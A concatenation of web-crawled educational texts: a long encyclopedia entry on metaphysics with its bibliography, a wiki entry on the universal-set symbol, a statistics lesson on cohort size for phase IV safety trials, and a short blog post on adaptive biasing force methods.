There is also the question of temporal passage—the question whether the apparent “movement” of time (or the apparent movement of ourselves and the objects of our experience through or in time) is a real feature of the world or some sort of illusion. In one way of thinking about time, there is a privileged temporal direction marking the difference between the past, present, and future. A-theorists hold that time is fundamentally structured in terms of a past/present/future distinction. Times change from past to present to future, giving rise to passage. (The name ‘A-theorist’ descends from J.M.E. McTaggart's (1908) name for the sequence past/present/future which he called the ‘A-series’.) Within the A-theory, we might further ask whether the past and future have the “same sort of reality” as the present. Presentist A-theorists, like Prior 1998, deny that the past or future have any concrete reality. Presentists typically think of the past and future as, at best, akin to abstract possible worlds—they are the way the world was or will be, just as possible worlds are ways the actual world could be. Other A-theorists, like Sullivan (2012), hold that the present is metaphysically privileged but deny that there is any ontological difference between the past, present, and future. More generally, A-theorists often incorporate strategies from modal metaphysics into their theories about the relation of the past and the future to the present.
According to B-theories of time, the only fundamental distinction we should draw is that some events and times are earlier or later relative to others. (These relations are called ‘B-relations’, a term also derived from McTaggart). According to the B-theorists, there is no objective passage of time, or at least not in the sense of time passing from future to present and from present to past. B-theorists typically maintain that all past and future times are real in the same sense in which the present time is real—the present is in no sense metaphysically privileged.
It is also true, and less often remarked on, that space raises philosophical questions that have no temporal analogues—or at least no obvious and uncontroversial analogues. Why, for example, does space have three dimensions and not four or seven? On the face of it, time is essentially one-dimensional and space is not essentially three-dimensional. It also seems that the metaphysical problems about space that have no temporal analogues depend on the fact that space, unlike time, has more than one dimension. For example, consider the problem of incongruent counterparts: those who think space is a mere system of relations struggled to explain our intuition that we could distinguish a world containing only a left hand from a world containing only a right hand. So it seems there is an intuitive orientation to objects in space itself. It is less clear whether the problems about time that have no spatial analogues are connected with the one-dimensionality of time.
Finally, one can raise questions about whether space and time are real at all—and, if they are real, to what extent (so to speak) they are real. Might it be that space and time are not constituents of reality as God perceives reality but nevertheless “well-founded phenomena” (as Leibniz held)? Was Kant right when he denied spatial and temporal features to “things as they are in themselves”?—and right to contend that space and time are “forms of our intuition”? Or was McTaggart's position the right one: that space and time are wholly unreal?
If these problems about space and time belong to metaphysics only in the post-Medieval sense, they are nevertheless closely related to questions about first causes and universals. First causes are generally thought by those who believe in them to be eternal and non-local. God, for example—both the impersonal God of Aristotle and the personal God of Medieval Christian, Jewish, and Muslim philosophy—is generally said to be eternal, and the personal God is said to be omnipresent. To say that God is eternal is to say either that he is everlasting or that he is somehow outside time. And this raises the metaphysical question of whether it is possible for there to be a being—not a universal or an abstract object of some other sort, but an active substance—that is everlasting or non-temporal. An omnipresent being is a being that does not occupy any region of space (not even the whole of it, as the luminiferous ether of nineteenth-century physics would if it existed), and whose causal influence is nevertheless equally present in every region of space (unlike universals, to which the concept of causality does not apply). The doctrine of divine omnipresence raises the metaphysical question whether it is possible for there to be a being with this feature. Ante res universals are said by some of their proponents (precisely those who deny that universals are constituents of particulars) to have no relations to space and time but “vicarious” ones: the ante res universal “whiteness” may be said to be present where each white particular is, but only in a way analogous to the way in which the number two is present where each pair of spatial things is. But it is doubtful whether this is a position that is possible for a metaphysician who says that a white thing is a bundle composed of whiteness and various other universals. Those who believe in the existence of in rebus universals are fond of saying, or have been in recent years, that these universals (‘immanent universals’ is a currently popular name for them) are “multiply located”—“wholly present” at each place at which the things that fall under them are present. And by this they certainly do not mean that whiteness is present in many different regions of space only vicariously, only as a number might be said to be present wherever there are things in that number, only in virtue of bearing the non-spatial relation “being had by” to a multitude of particulars each of which is present in a single region of space. All theories of universals, therefore, raise questions about how things in various ontological categories are related to space. And all these questions have temporal analogues.
3.3 Persistence and Constitution
Related to questions about the nature of space and time are questions about the nature of objects that take up space or persist through time, and these questions form yet another central theme in post-medieval metaphysics. Are some or all objects composed of proper parts? Must an object have proper parts in order to “fill up” a region of space—or are there extended simples? Can more that one object be located in exactly the same region? Do objects persist through change by having temporal parts?
Much work on persistence and constitution has focused on efforts to address a closely knit family of puzzles—the puzzles of coincidence. One such puzzle is the “problem of the statue and the lump”. Consider a gold statue. Many metaphysicians contend that there is at least one material object that is spatially co-extensive with the statue, a lump of gold. This is easily shown, they say, by an appeal to Leibniz's Law (the principle of the non-identity of discernibles). There is a statue here and there is a lump of gold here, and—if the causal story of the statue's coming to be is of the usual sort—the lump of gold existed before the statue. And even if God has created the statue (and perforce the lump) ex nihilo and will at some point annihilate the statue (and thereby annihilate the lump), they further argue, the statue and the lump, although they exist at exactly the same times, have different modal properties: the lump has the property “can survive radical deformation” and the statue does not. Or so these metaphysicians conclude. But it has seemed to other metaphysicians that this conclusion is absurd, for it is absurd to suppose (these others say) that there could be spatially coincident physical objects that share all their momentary non-modal properties. Hence, the problem: What, if anything, is the flaw in the argument for the non-identity of the statue and the lump?
A second puzzle in this family is the “problem of Tib and Tibbles”. Tibbles is a cat. Call his tail “Tail”. Call all of him but his tail “Tib”. Suppose Tail is cut off—or, better, annihilated. Tibbles still exists, for a cat can survive the loss of its tail. And it would seem that Tib will exist after the “loss” of Tail, because Tib lost no part. But what will be the relation between Tib and Tibbles? Can it be identity? No, that is ruled out by the non-identity of discernibles, for Tibbles will have become smaller and Tib will remain the same size. But then, once again, we seem to have a case of spatially coincident material objects that share their momentary non-modal properties.
Both these constitution problems turn on questions about the identities of spatially coincident objects—and, indeed, of objects that share all their (proper) parts. (A third famous problem of material constitution—the problem of the Ship of Theseus—raises questions of a different sort.) Some metaphysicians contend that the relation between the lump and the statue, on the one hand, and the relation between Tib and Tibbles, on the other, cannot be fully understood in terms of the concepts of parthood and (non-) identity, but require a further concept, a non-mereological concept, the concept of “constitution”: the pre-existent lump at a certain point in time comes to constitute the statue (or a certain quantity of gold or certain gold atoms that first constituted only the lump come to constitute them both); pre-existent Tib at a certain point in time comes to constitute Tibbles (or certain cat-flesh or certain molecules …). (Baker 2000 is a defense of this thesis.) Others contend that all the relations between the objects that figure in both problems can be fully analyzed in terms of parthood and identity. For a more thorough overview of the solutions to these puzzles and different theories of constitution in play, see Rea (ed.) 1997 and Thomson 1998.
3.4 Causation, Freedom and Determinism
Questions about causation form yet a fourth important category of issues in the “new” metaphysics. Of course, discussion of causes go back to Ancient Philosophy, featuring prominently in Aristotle's Metaphysics and Physics. But Aristotle understood ‘cause’ in a much broader sense than we do today. In Aristotle's sense, a ‘cause’ or ‘aiton’ is an explanatory condition of an object—an answer to a “why” question about the object. Aristotle classifies four such explanatory conditions—an object's form, matter, efficient cause, and teleology. An object's efficient cause is the cause which explains change or motion in an object. With the rise of modern physics in the seventeenth century, interest in efficient causal relations became acute, and it remains so today. And when contemporary philosophers discuss problems of causation, they typically mean this sense.
One major issue in the metaphysics of causation concerns specifying the relata of causal relations. Consider a mundane claim: an iceberg caused the Titanic to sink. Does the causal relation hold between two events: the event of the ship hitting the iceberg and the event of the ship sinking? Or does it hold between two sets of states of affairs? Or does it hold between two substances, the iceberg and the ship? Must causal relations be triadic or otherwise poly-adic? For example, one might think that we are always required to qualify a causal claim: the iceberg, rather than the captain's negligence, was causally responsible for the ship’s foundering. And can absences feature in causal relations? For example, does it make sense to claim that a lack of lifeboats was the cause of a third-class passenger's death?
We might further ask whether causal relations are objective and irreducible features of reality. Hume famously doubted this, theorizing that our observations of causation were nothing more than observations of constant conjunction. For example, perhaps we think icebergs cause ships to sink only because we always observe ship-sinking events occurring after iceberg-hitting events and not because there is a real causal relation that holds between icebergs and foundering ships.
Contemporary metaphysicians have been attracted to other kinds of reductive treatments of causation. Some—like Stalnaker and Lewis—have argued that causal relations should be understood in terms of counterfactual dependencies (Stalnaker 1968 and Lewis 1973). For example, an iceberg's striking the ship caused its sinking at time t if and only if in the nearest possible worlds where the iceberg did not strike the ship at time t, the ship did not sink. Others have argued that causal relations should be understood in terms of instantiations of laws of nature. (Davidson (1967) and Armstrong (1997) each defend this view albeit in different ways.) All of these theories expand on an idea from Hume's Treatise in attempting to reduce causation to different or more fundamental categories. (For a more complete survey of recent theories of causation, see Paul and Hall 2013.)
Debates about causation and laws of nature further give rise to a related set of pressing philosophical questions—questions of freedom. In the seventeenth century, celestial mechanics gave philosophers a certain picture of a way the world might be: it might be a world whose future states were entirely determined by the past and the laws of nature (of which Newton's laws of motion and law of universal gravitation served as paradigms). In the nineteenth century the thesis that the world was indeed this way came to be called ‘determinism’. The problem of free will can be stated as a dilemma. If determinism is true, there is only one physically possible future. But then how can anyone ever have acted otherwise? For, as Carl Ginet has said (1990: 103), our freedom can only be the freedom to add to the actual past; and if determinism holds, then there is only one way that the given—the actual—past can be “added to”. But if determinism does not hold, if there are alternative physically possible futures, then which one comes to pass must be a mere matter of chance. And if it is a mere matter of chance whether I lie or tell the truth, how can it be “up to me” whether I lie or tell the truth? Unless there is something wrong with one of these two arguments, the argument for the incompatibility of free will and determinism or the argument for the incompatibility of free will and the falsity of determinism, free will is impossible. The problem of free will may be identified with the problem of discovering whether free will is possible—and, if free will is possible, the problem of giving an account of free will that displays an error in one of (or both) these arguments.
Van Inwagen (1998) defends the position that, although the modern problem of free will has its origin in philosophical reflections on the consequences of supposing the physical universe to be governed by deterministic laws, the problem cannot be evaded by embracing a metaphysic (like dualism or idealism) that supposes that agents are immaterial or non-physical. This leads into our next and final sample of topics from the “new” metaphysics.
3.5 The Mental and Physical
If it is natural both to pair and to oppose time and space, it is also natural to pair and to oppose the mental and the physical. The modern identity theory holds that all mental events or states are a special sort of physical event or state. The theory is parsimonious (among its other virtues) but we nevertheless exhibit a natural tendency to distinguish the mental and the physical. Perhaps the reason for this is epistemological: whether our thoughts and sensations are physical or not, the kind of awareness we have of them is of a radically different sort from the kind of awareness we have of the flight of a bird or of a flowing stream, and it seems to be natural to infer that the objects of the one sort of awareness are radically different from the objects of the other. That the inference is logically invalid is (as is so often the case) no barrier to its being made. Whatever the reason may be, philosophers have generally (but not universally) supposed that the world of concrete particulars can be divided into two very different realms, the mental and the material. (As the twentieth century passed and physical theory rendered “matter” an increasingly problematical concept, it became increasingly common to say “the mental and the physical”.) If one takes this view of things, one faces philosophical problems that modern philosophy has assigned to metaphysics.
Prominent among these is the problem of accounting for mental causation. If thoughts and sensations belong to an immaterial or non-physical portion of reality—if, for example, they are changes in immaterial or non-physical substances—how can they have effects in the physical world? How, for example, can a decision or act of will cause a movement of a human body? How, for that matter, can changes in the physical world have effects in the non-physical part of reality? If one's feeling pain is a non-physical event, how can a physical injury to one's body cause one to feel pain? Both questions have troubled “two realm” philosophers—or ‘dualists’, to give them their more usual name. But the former has troubled them more, since modern physics is founded on principles that assert the conservation of various physical quantities. If a non-physical event causes a change in the physical world—dualists are repeatedly asked—does that not imply that physical quantities like energy or momentum fail to be conserved in any physically closed causal system in which that change occurs? And does that not imply that every voluntary movement of a human body involves a violation of the laws of physics—that is to say, a miracle?
A wide range of metaphysical theories have been generated by the attempts of dualists to answer these questions. Some have been less than successful for reasons that are not of much intrinsic philosophical interest. C. D. Broad, for example, proposed (1925: 103–113) that the mind affects the body by momentarily changing the electrical resistance of certain synapses in the brain, (thus diverting various current pulses, which literally follow the path of least resistance into paths other than those they would have taken). And this, he supposed, would not imply a violation of the principle of the conservation of energy. But it seems impossible to suppose that an agent could change the electrical resistance of a physical system without expending energy in the process, for to do this would necessitate changing the physical structure of the system, and that implies changing the positions of bits of matter on which forces are acting (think of turning the knob on a rheostat or variable resistor: one must expend energy to do this). If this example has any philosophical interest it is this: it illustrates the fact that it is impossible to imagine a way for a non-physical thing to affect the behavior of a (classical) physical system without violating a conservation principle.
The various dualistic theories of the mind treat the interaction problem in different ways. The theory called ‘dualistic interactionism’ does not, of itself, have anything to say about the problem—although its various proponents (Broad, for example) have proposed solutions to it. ‘Occasionalism’ simply concedes that the “local” counterfactual dependence of the behavior of a physical system on a non-physical event requires a miracle. The theory of pre-established harmony, which substitutes “global” for local counterfactual dependence of voluntary physical movements on the mental states of agents, avoids problems with conservation principles—but secures this advantage at a great price. (Like occasionalism, it presupposes theism, and, unlike occasionalism, it entails either that free will does not exist or that free will is compatible with determinism.) ‘Epiphenomenalism’ simply denies that the mental can affect the physical, and contents itself with an explanation of why the mental appears to affect the physical.
In addition to these dualistic theories, there are monistic theories, theories that dissolve the interaction problem by denying the existence of either the physical or the non-physical: idealism and physicalism. (Present-day philosophers for the most part prefer the term ‘physicalism’ to the older term ‘materialism’ for reasons noted above.) Most current work in the philosophy of mind presupposes physicalism, and it is generally agreed that a physicalistic theory that does not simply deny the reality of the mental (that is not an “eliminativist” theory), raises metaphysical questions. Such a theory must, of course, find a place for the mental in a wholly physical world, and such a place exists only if mental events and states are certain special physical events and states. There are at least three important metaphysical questions raised by these theories. First, granted that all particular mental events or states are identical with particular physical events or states, can it also be that some or all mental universals (‘event-types’ and ‘state-types’ are the usual terms) are identical with physical universals? Secondly, does physicalism imply that mental events and states cannot really be causes (does physicalism imply a kind of epiphenomenalism)? Thirdly, can a physical thing have non-physical properties—might it be that mental properties like “thinking of Vienna” or “perceiving redly” are non-physical properties of physical organisms? This last question, of course, raises a more basic metaphysical question, ‘What is a non-physical property?’ And all forms of the identity theory raise fundamental metaphysical questions, ontological questions, questions like, ‘What is an event?’ and ‘What is a state?’.
4. The Methodology of Metaphysics
As is obvious from the discussion in Section 3, the scope of metaphysics has expanded beyond the tidy boundaries Aristotle drew. So how should we answer our original question? Is contemporary metaphysics just a compendium of philosophical problems that cannot be assigned to epistemology or logic or ethics or aesthetics or to any of the parts of philosophy that have relatively clear definitions? Or is there a common theme that unites work on these disparate problems and distinguishes contemporary metaphysics from other areas of inquiry?
These issues concerning the nature of metaphysics are further connected with issues about the epistemic status of various metaphysical theories. Aristotle and most of the Medievals took it for granted that, at least in its most fundamental aspects, the ordinary person's picture of the world is “correct as far as it goes”. But many post-Medieval metaphysicians have refused to take this for granted. Some of them, in fact, have been willing to defend the thesis that the world is very different from, perhaps radically different from, the way people thought it was before they began to reason philosophically. For example, in response to the puzzles of coincidence considered in Section 3.3, some metaphysicians have maintained that there are no objects with proper parts. This entails that composite objects—tables, chairs, cats, and so on—do not exist, a somewhat startling view. And as we saw in Section 3.1, other metaphysicians have been happy to postulate the reality of concrete merely possible worlds if this posit makes for a simpler and more explanatorily powerful theory of modality. Perhaps this contemporary openness to “revisionary” metaphysics is simply a recovery of or a reversion to a pre-Aristotelian conception of a “permissible metaphysical conclusion”, a conception that is illustrated by Zeno's arguments against the reality of motion and Plato's Allegory of the Cave. But no matter how we classify it, the surprising nature of many contemporary metaphysical claims puts additional pressure on practioners to explain just what they are up to. They raise questions of the methodology of metaphysics.
One attractive strategy for answering these questions emphasizes the continuity of metaphysics with science. On this conception, metaphysics is primarily or exclusively concerned with developing generalizations from our best-confirmed scientific theories. For example, in the mid-twentieth century, Quine (1948) proposed that that the “old/intermediate” metaphysical debate over the status of abstract objects should be settled in this way. He observed that if our best scientific theories are recast in the “canonical notation of (first-order) quantification” (in sufficient depth that all the inferences that users of these theories will want to make are valid in first-order logic), then many of these theories, if not all of them, will have as a logical consequence the existential generalization on a predicate \(F\) such that \(F\) is satisfied only by abstract objects. It would seem, therefore, that our best scientific theories “carry ontological commitment” to objects whose existence is denied by nominalism. (These objects may not be universals in the classical sense. They may, for example, be sets.) Take for example the simple theory, ‘There are homogeneous objects, and the mass of a homogeneous object in grams is the product of its density in grams per cubic centimeter and its volume in cubic centimeters’. A typical recasting of this theory in the canonical notation of quantification is:
\(\exists Hx\) & \(\forall x(Hx \rightarrow Mx = Dx \times Vx)\)
(‘\(Hx\)’: ‘\(x\) is homogeneous’; ‘\(Mx\)’: ‘the mass of \(x\) in grams’; ‘\(Dx\)’: ‘the density of \(x\) in grams per cubic centimeter’; ‘\(Vx\)’: ‘the volume of \(x\) in cubic centimeters’.) A first-order logical consequence of this “theory” is
\(\exists x\exists y\exists z(x = y \times z)\)
That is: there exists at least one thing that is a product (at least one thing that, for some \(x\) and some \(y\) is the product of \(x\) and \(y\)). And a product must be a number, for the operation “product of” applies only to numbers. Our little theory, at least if it is recast in the way shown above, is therefore, in a very obvious sense, “committed” to the existence of numbers. It would seem, therefore, that a nominalist cannot consistently affirm that theory. (In this example, the role played by ‘the predicate F’ in the abstract statement of Quine's “observation” is played by the predicate ‘…=…×…’.)
Quine's work on nominalism inspired a much broader program for approaching ontological questions. According to “neo-Quineans”, questions about the existence of abstract objects, mental events, objects with proper parts, temporal parts, and even other concrete possible worlds are united to the extent that they are questions about the ontological machinery required to account for the truth of our best-confirmed theories. Still, many questions of the new and old metaphysics are not questions of ontology. For example, many participants in the debate over causation are not particularly worried about whether causes and effects exist. Rather, they want to know “in virtue of what” something is a cause or effect. Few involved in the debate over the mental and physical are interested in the question whether there are mental properties (in some sense or other). Rather, they are interested in whether mental properties are “basic” or sui generis—or whether they are grounded, partially or fully, in physical properties.
Is there a unified methodology for metaphysics more broadly understood? Some think the task of the metaphysician is to identify and argue for explanatory relations of various kinds. According to Fine (2001), metaphysicians are in the business of providing theories of which facts or propositions ground other facts or propositions, and which facts or propositions hold “in reality”. For example, a philosopher might hold that tables and other composite objects exist, but think that facts about tables are completely grounded in facts about the arrangements of point particles or facts about the state of a wave function. This metaphysician would hold that there are no facts about tables “in reality”; rather, there are facts about arrangements of particles. Schaffer 2010 proposes a similar view, but holds that metaphysical grounding relations hold not between facts but between entities. According to Schaffer, the fundamental entity/entities should be understood as the entity/entities that grounds/ground all others. On Schaffer's conception we can meaningfully ask whether a table is grounded in its parts or vice versa. We can even theorize (as Schaffer does) that the world as a whole is the ultimate ground for everything.
Another noteworthy approach (Sider 2012) holds that the task of the metaphysician is to “explain the world” in terms of its fundamental structure. For Sider, what unites (good) metaphysics as a discipline is that its theories are all framed in terms that pick out the fundamental structure of the world. For example, according to Sider we may understand ‘causal nihilism’ as the view that causal relations do not feature in the fundamental structure of the world, and so the best language for describing the world will eschew causal predicates.
It should be emphasized that these ways of delimiting metaphysics do not presuppose that all of the topics we've considered as examples of metaphysics are substantive or important to the subject. Consider the debate about modality. Quine (1953) and Sider (2012) both argue from their respective theories about the nature of metaphysics that aspects of the debate over the correct metaphysical theory of modality are misguided. Others are skeptical of the debates about composition or persistence through time. So theories about the nature of metaphysics might give us new resources for criticizing particular first-order debates that have historically been considered metaphysical, and it is common practice for metaphysicians to regard some debates as substantive while adopting a deflationist attitude about others.
5. Is Metaphysics Possible?
It may also be that there is no internal unity to metaphysics. More strongly, perhaps there is no such thing as metaphysics—or at least nothing that deserves to be called a science or a study or a discipline. Perhaps, as some philosophers have proposed, no metaphysical statement or theory is either true or false. Or perhaps, as others have proposed, metaphysical theories have truth-values, but it is impossible to find out what they are. At least since the time of Hume, there have been philosophers who have proposed that metaphysics is “impossible”—either because its questions are meaningless or because they are impossible to answer. The remainder of this entry will be a discussion of some recent arguments for the impossibility of metaphysics.
Let us suppose that we are confident that we are able to identify every statement as either “a metaphysical statement” or “not a metaphysical statement”. (We need not suppose that this ability is grounded in some non-trivial definition or account of metaphysics.) Let us call the thesis that all metaphysical statements are meaningless “the strong form” of the thesis that metaphysics is impossible. (At one time, an enemy of metaphysics might have been content to say that all metaphysical statements were false. But this is obviously not a possible thesis if the denial of a metaphysical statement must itself be a metaphysical statement.) And let us call the following statement the “weak form” of the thesis that metaphysics is impossible: metaphysical statements are meaningful, but human beings can never discover whether any metaphysical statement is true or false (or probable or improbable or warranted or unwarranted).
Let us briefly examine an example of the strong form of the thesis that metaphysics is impossible. The logical positivists maintained that the meaning of a (non-analytic) statement consisted entirely in the predictions it made about possible experience. They maintained, further, that metaphysical statements (which were obviously not put forward as analytic truths) made no predictions about experience. Therefore, they concluded, metaphysical statements are meaningless—or, better, the “statements” we classify as metaphysical are not really statements at all: they are things that look like statements but aren't, rather as mannequins are things that look like human beings but aren't.
But (many philosophers asked) how does the logical positivist's central thesis
The meaning of a statement consists entirely in the predictions it makes about possible experience
fare by its own standards? Does this thesis make any predictions about possible experiences? Could some observation show that it was true? Could some experiment show that it was false? It would seem not. It would seem that everything in the world would look the same—like this—whether this thesis was true or false. (Will the positivist reply that the offset sentence is analytic? This reply is problematic in that it implies that the multitude of native speakers of English who reject the logical positivists' account of meaning somehow cannot see that that sentence is true in virtue of the meaning of the word “meaning”—which is no technical term but a word of ordinary English.) And, therefore, if the statement is true it is meaningless; or, what is the same thing, if it is meaningful, it is false. Logical positivism would therefore seem to say of itself that it is false or meaningless; it would be seem to be, to use a currently fashionable phrase, “self-referentially incoherent”.
Current advocates of ‘metaphysical anti-realism’ also advocate a strong form of the thesis that metaphysics is impossible. Insofar as it is possible to find a coherent line of argument in the writings of any anti-realist, it is hard to see why they, like the logical positivists, are not open to a charge of self-referential incoherency. Indeed, there is much to be said for the conclusion that all forms of the strong thesis fall prey to self-referential incoherency. Put very abstractly, the case against proponents of the strong thesis may be put like this. Dr. McZed, a “strong anti-metaphysician”, contends that any piece of text that does not pass some test she specifies is meaningless (if she is typical of strong anti-metaphysicians, she will say that any text that fails the test represents an attempt to use language in a way in which language cannot be used). And she contends further that any piece of text that can plausibly be identified as “metaphysical” must fail this test. But it invariably turns out that various sentences that are essential components of McZed's case against metaphysics themselves fail to pass her test. A test-case for this very schematic and abstract refutation of all refutations of metaphysics is the very sophisticated and subtle critique of metaphysics (it purports to apply only to the kind of metaphysics exemplified by the seventeenth-century rationalists and current analytical metaphysics) presented in van Fraassen 2002. It is a defensible position that van Fraassen's case against metaphysics depends essentially on certain theses that, although they are not themselves metaphysical theses, are nevertheless open to many of the criticisms he brings against metaphysical theses.
The weak form of the thesis that metaphysics is impossible is this: there is something about the human mind (perhaps even the minds of all rational agents or all finite rational agents) that unfits it for reaching metaphysical conclusions in any reliable way. This idea is at least as old as Kant, but a version of it that is much more modest than Kant's (and much easier to understand) has been carefully presented in McGinn 1993. McGinn's argument for the conclusion that the human mind is (as a matter of evolutionary contingency, and not simply because it is “a mind”) incapable of a satisfactory treatment of a large range of philosophical questions (a range that includes all metaphysical questions), however, depends on speculative factual theses about human cognitive capacities that are in principle subject to empirical refutation and which are at present without significant empirical support. For a different defense of the weak thesis, see Thomasson 2009.
- Armstrong, David, 1989, Universals: An Opinionated Introduction, Boulder, CO: Westview.
- –––, 1997, A World of States of Affairs, Cambridge: Cambridge University Press.
- Baker, Lynne Rudder, 2000, Persons and Bodies: A Constitution View, Cambridge: Cambridge University Press.
- Barcan [Barcan Marcus], Ruth, 1946, “A Functional Calculus of First Order Based on Strict Implication”, Journal of Symbolic Logic, 11: 1–16.
- Broad, C. D., 1925, The Mind and its Place in Nature, London: Lund Humphries.
- Davidson, Donald, 1967, “Causal Relations”, Journal of Philosophy, 64: 691–703.
- Fine, Kit, 2001, “The Question of Realism”, Philosopher's Imprint, 1: 1–30.
- Ginet, Carl, 1990, On Action, Cambridge: Cambridge University Press.
- Kripke, Saul, 1972, Naming and Necessity, Cambridge, MA: Harvard University Press.
- Laurence, Stephen and Cynthia Macdonald (eds.), 1998, Contemporary Readings in the Foundations of Metaphysics, Oxford: Blackwell.
- Lewis, David, 1973, “Causation”, Journal of Philosophy, 70: 556–67.
- –––, 1986, On the Plurality of Worlds, Oxford: Blackwell.
- Lowe, E. J., 2006, The Four-Category Ontology: A Metaphysical Foundation for Natural Science, Oxford: The Clarendon Press.
- McGinn, Colin, 1993, Problems in Philosophy: The Limits of Inquiry, Oxford: Blackwell.
- McTaggart, J.M. E., 1908, “The Unreality of Time” Mind, 17: 457–474.
- Paul, L.A. and Ned Hall, 2013, Causation: A User's Guide, Oxford: Oxford University Press.
- Plantinga, Alvin, 1974, The Nature of Necessity, Oxford: The Clarendon Press.
- Politis, Vasilis, 2004, Aristotle and the Metaphysics, London and New York: Routledge.
- Prior, A.N., 1998, “The Notion of the Present”, in Metaphysics: The Big Questions, Peter van Inwagen and Dean Zimmerman (eds.), Oxford: Blackwell Press.
- Quine, W. V. O., 1948, “On What There Is”, in Quine 1961: 1–19.
- –––, 1953, “Reference and Modality”, in Quine 1961: 139–159.
- –––, 1960, Word and Object, Cambridge, MA: MIT Press.
- –––, 1961, From a Logical Point of View, Cambridge, MA: MIT Press.
- Rea, Michael (ed.), 1997, Material Constitution: A Reader, Lanham, MD: Rowman & Littlefield.
- Sartre, Jean-Paul, 1949, Situations III, Paris: Gallimard.
- Schaffer, Jonathan, 2010, “Monism: The Priority of the Whole”, Philosophical Review, 119. 31–76.
- Sider, Theodore, 2012, Writing the Book of the World, Oxford: Oxford University Press.
- Stalnaker, Robert, 1968, “A Theory of Conditionals”, in Studies in Logical Theory, Nicholas Rescher (ed.), Oxford: Blackwell.
- Sullivan, Meghan, 2012, “The Minimal A-Theory”, Philosophical Studies, 158: 149–174.
- Thomasson, Amie, 2009, “Answerable and Unanswerable Questions”, in Metametaphysics: New Essays on the Foundations of Ontology, David J. Chalmers, David Manley, and Ryan Wasserman (eds.), Oxford: Oxford University Press.
- Thomson, Judith Jarvis, 1998, “The Statue and Clay”, Noûs, 32: 149–173
- Van Fraassen, Bas C., 2002, The Empirical Stance, New Haven, CT: Yale University Press.
- Van Inwagen, Peter, 1998, “The Mystery of Metaphysical Freedom”, in Peter van Inwagen and Dean W. Zimmerman (eds.), Metaphysics: The Big Questions, Malden, MA: Blackwell: 365–374.
- Williamson, Timothy, 2013, Modal Logic as Metaphysics, Oxford: Oxford University Press.
- Zimmerman, Dean W. (ed.), 2006, Oxford Studies in Metaphysics (Volume 2), Oxford: The Clarendon Press.
How to cite this entry. Preview the PDF version of this entry at the Friends of the SEP Society. Look up topics and thinkers related to this entry at the Internet Philosophy Ontology Project (InPhO). Enhanced bibliography for this entry at PhilPapers, with links to its database.
Other Internet Resources
- The Determinism and Freedom Philosophy Website, edited by Ted Honderich.
[Please contact the author with other suggestions.] | <urn:uuid:88e27db8-8af7-43e1-8df7-25f4e68487e4> | CC-MAIN-2023-14 | https://plato.sydney.edu.au/entries/metaphysics/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943555.25/warc/CC-MAIN-20230320175948-20230320205948-00611.warc.gz | en | 0.945348 | 20,151 | 3.125 | 3 |
- $\mathbb U$
Sets are considered to be subsets of some large universal set, also called the universe.
Exactly what this universe is will vary depending on the subject and context.
When discussing particular sets, it should be made clear just what that universe is.
However, note that from There Exists No Universal Set, this universe cannot be everything that there is.
The traditional symbol used to signify the universe is $\mathfrak A$.
However, this is old-fashioned and inconvenient, so some newer texts have taken to using $\mathbb U$ or just $U$ instead.
With this notation, this definition can be put into symbols as:
- $\forall S: S \subseteq \mathbb U$
The use of $\mathbb U$ or a variant is not universal: some sources use $X$.
The $\LaTeX$ code for \(\mathbb U\) is
\mathbb U .
Frequently used, and conventionally in many texts, to denote an open set in the context of topology.
The $\LaTeX$ code for \(U\) is | <urn:uuid:ddaef4d8-b7d6-4cd5-a3b8-e1fda5c203fd> | CC-MAIN-2023-14 | https://www.proofwiki.org/wiki/Symbols:U | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945381.91/warc/CC-MAIN-20230326013652-20230326043652-00611.warc.gz | en | 0.871112 | 256 | 3.171875 | 3 |
Expanded Safety (ES) trials are phase IV trials designed to estimate the frequency of uncommon adverse events that may have been undetected in earlier studies. These studies may be nonrandomized.
Typically, we assume that the study population is large, the probability of an adverse event is small (because it did not crop up in prior trials), and all participants in the cohort of size m are followed for approximately the same length of time. Under these assumptions, we can model the probability of exactly d events occurring based on a Poisson probability function, i.e.,
\( Pr \left[ D = d \right] = ( \xi m)^d exp(- \xi m)/d! \)
where \( \xi \) is the adverse event rate.
The cohort should be large enough to have a high probability of observing at least one event when the event rate is \( \xi \). Thus, we want
\( \beta = Pr \left[D \ge 1 \right] = 1 - Pr \left[ D = 0 \right] = 1 - exp(-\xi m) \)
to be relatively large. With respect to the cohort size, this means that m should be selected such that
\( m = -log_e(1 - \beta)/ \xi \)
Suppose a pharmaceutical company is planning an ES trial for a new anti-arrhythmia drug. The company wants to determine the cohort size for following patients on the drug for a period of two years in terms of myocardial infarction. They want to have a 0.99 probability \(\left(\beta = 0.99 \right)\) for detecting a myocardial infarction rate of one per thousand (\( \xi \) = 0.001).
This yields a cohort size of m = 4,605.1. Rounded up, 4606.
(note the \(\beta\) value in this problem is a probability, not quite the same as \(\beta\) that we use in calculating power) | <urn:uuid:67a79361-0f68-4618-8a01-e0c35d0899c2> | CC-MAIN-2023-14 | https://online.stat.psu.edu/stat509/lesson/6a/6a.9 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945368.6/warc/CC-MAIN-20230325161021-20230325191021-00012.warc.gz | en | 0.926287 | 439 | 2.609375 | 3 |
Terrace and gradientPosted by Yuling Yao on Oct 05, 2021.
I come across a paper “The Adaptive Biasing Force Method: Everything You Always Wanted To Know but Were Afraid To Ask” by Jeffrey Comer et al. When comparing the adaptive biasing force method (gradient based method) and importance sampling based methods (zero-order method), the authors concluded that
From a mathematical viewpoint, the adaptive biasing force method, just like adaptive biasing potential methods, is an adaptive importance-sampling procedure. There is, however, a salient difference between these two techniques. In the latter, the potential of mean force or, equivalently, the corresponding probability distribution along the transition coordinate is being adapted. In contrast, the former relies on biasing the force, i.e., the gradient of the potential. This difference is more important than it might appear at first sight, as potentials and probability distributions are global properties whereas gradients are defined locally. In terms of probability distributions, it means that the count of samples in the neighborhood of a given value of the transition coordinate is insufficient to estimate probability. Knowledge of the underlying probability distribution over a much broader range of $\xi$ is required. This may considerably impede efficient adaptation. In contrast, all that is needed to estimate the gradient is the knowledge of local behavior of the potential of mean force. Other regions along the transition coordinate do not have to be visited. Thus, in many instances, adaptation proceeds markedly faster. Using a common metaphor, the difference between the adaptive biasing potential and adaptive biasing force methods can be compared to inundating the valleys of the free-energy landscape as opposed to plowing over its barriers to yield an approximately flat terrain, conducive to unhampered diffusion.
I like the plowing metaphor. I found a photo of Rice Terraces in Yunnan:
which is in contrast to:
